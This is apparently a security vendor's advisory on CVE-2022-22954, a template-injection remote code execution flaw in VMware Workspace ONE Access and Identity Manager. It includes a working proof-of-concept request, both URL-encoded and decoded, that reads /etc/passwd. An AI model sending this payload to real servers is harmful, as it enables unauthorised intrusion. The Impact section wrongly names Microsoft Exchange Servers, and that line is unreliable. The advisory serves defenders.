Multiple VMware Products Found Vulnerable to Server-Side Template Injection CVE-2022-22954

Category: Vulnerability Intelligence Vulnerability Class: Server-Side Template Injection/RCE CVE ID: CVE-2022-22954 CVSS:3.0 Score: 9.8 Executive Summary CloudSEK’s Customer Threat Research Team analyzed remote code execution impacting Vmware products that include Workspace ONE Access and Identity Manager. The VMware Workspace ONE Access provides users faster access to SaaS, web, and native mobile apps with Multi-Factor […]
Updated on
April 19, 2023
Published on
April 15, 2022
Read MINUTES
5
Subscribe to the latest industry news, threats and resources.
 
Category: Vulnerability Intelligence Vulnerability Class: Server-Side Template Injection/RCE CVE ID: CVE-2022-22954 CVSS:3.0 Score: 9.8

Executive Summary

  • CloudSEK’s Customer Threat Research Team analyzed remote code execution impacting Vmware products that include Workspace ONE Access and Identity Manager.
  • The VMware Workspace ONE Access provides users faster access to SaaS, web, and native mobile apps with Multi-Factor Authentication (MFA), conditional access, and single sign-on functionality and the VMware Identity Manager is Workspace ONE's identity and access management component.
  • The server-side template injection has been assigned CVE-2022-22954 with a maximum CVSSv3 score of 9.8 and affected VMware versions include:
    • VMware Workspace ONE Access Appliance - 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0
    • VMware Identity Manager Appliance - 3.3.6, 3.3.5, 3.3.4, 3.3.3
  • VMWare has released the patches essential to fix this vulnerability.

Analysis

  • On 6 April 2022, VMWare released an advisory addressing eight vulnerabilities present in Multiple VMWare products.
  • CVE-2022-22954 is a server-side template injection vulnerability that can lead to remote code execution on the affected versions. It impacts the VMWare Workspace ONE Access as well as VMware Identity Manager and has been assigned a critical CVSSv3 base score of 9.8.
  • To exploit the vulnerability, an attacker with network access simply needs to send a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager.
  • The successful exploitation of the vulnerability could result in remote code execution on the vulnerable server.

Information from OSINT

  • A Shodan search revealed that 711 publicly exposed VMWare Workspace One instances.
  • Several threat actors including APT groups have targeted VMWare products in the past to conduct attacks ranging from ransomware to espionage.
[caption id="attachment_19186" align="alignnone" width="1097"]Publicly reachable VMWare Workspace One Instances Publicly reachable VMWare Workspace One Instances[/caption]  

Information from Cybercrime Platforms

  • Multiple threat actors have been discussing this vulnerability on various cybercrime forums and Telegram channels. (For more information refer to the Appendix)
  • The discussions comprise the following information:
  • Methods of leveraging the impact by chaining exploits.
  • Shodan queries to search for vulnerable instances in the wild.
  • Functioning proof of concepts (PoCs) by request using intercepting tools like BurpSuite.

How does SSTI Result in Remote Code Execution?

  • An SSTI(server-side template injection) vulnerability results in the ability to execute commands on the remote server. This attack vector is very well documented and affects almost all the major backend infrastructures and related templates e.g. - FreeMarker/Java, Velocity/Java, Twig/PHP, Jade/Nodejs and the list goes on.
  • Server-side template injection attacks can occur whenever user input is concatenated directly into a template, rather than being passed in as data. Hence, attackers can manipulate the template engine by injecting arbitrary template directives.
  • An attacker can use this to execute commands and execute reverse shell payloads that could potentially result in Remote Code Execution. This makes the vulnerability extremely easy to exploit while granting complete server control.

POC (Proof of Concept)

{host}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61% 72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%7 8%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f %70%61%73%73%77%64%22%29%7d   PoC for CVE-2022-22954
  • The above GET request will return the contents of the /etc/passwd file from a vulnerable server.
  • The URL encoded string given as a parameter to the deviceUdid argument is: ${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}

Impact & Mitigation

Impact Mitigation
  • Attackers could use this exploit to gain unauthorized access and gain higher privileges to Microsoft Exchange Servers.
  • This vulnerability could even lead to an RCE (Remote code execution) attack.
  • RCE can lead to devastating attacks including but not limited to ransomware campaigns.

References

Appendix

[caption id="attachment_19187" align="alignnone" width="1600"]PoC of the exploitation of CVE-2022-22954 PoC of the exploitation of CVE-2022-22954[/caption]   [caption id="attachment_19188" align="alignnone" width="580"]A threat actor discussing the vulnerability on a Telegram channel A threat actor discussing the vulnerability on a Telegram channel[/caption]   [caption id="attachment_19189" align="alignnone" width="1263"]A threat actor posting about the vulnerability on a cybercrime forum A threat actor posting about the vulnerability on a cybercrime forum[/caption]  

Get Global Threat Intelligence on Real Time

Protect your business from cyber threats with real-time global threat intelligence data.. 30-day free and No Commitment Trial.
Schedule a Demo
Real time Threat Intelligence Data
More information and context about Underground Chatter
On-Demand Research Services
Dashboard mockup
Global Threat Intelligence Feed

Protect and proceed with Actionable Intelligence

The Global Cyber Threat Intelligence Feed is an innovative platform that gathers information from various sources to help businesses and organizations stay ahead of potential cyber-attacks. This feed provides real-time updates on cyber threats, including malware, phishing scams, and other forms of cybercrime.
Trusted by 400+ Top organisations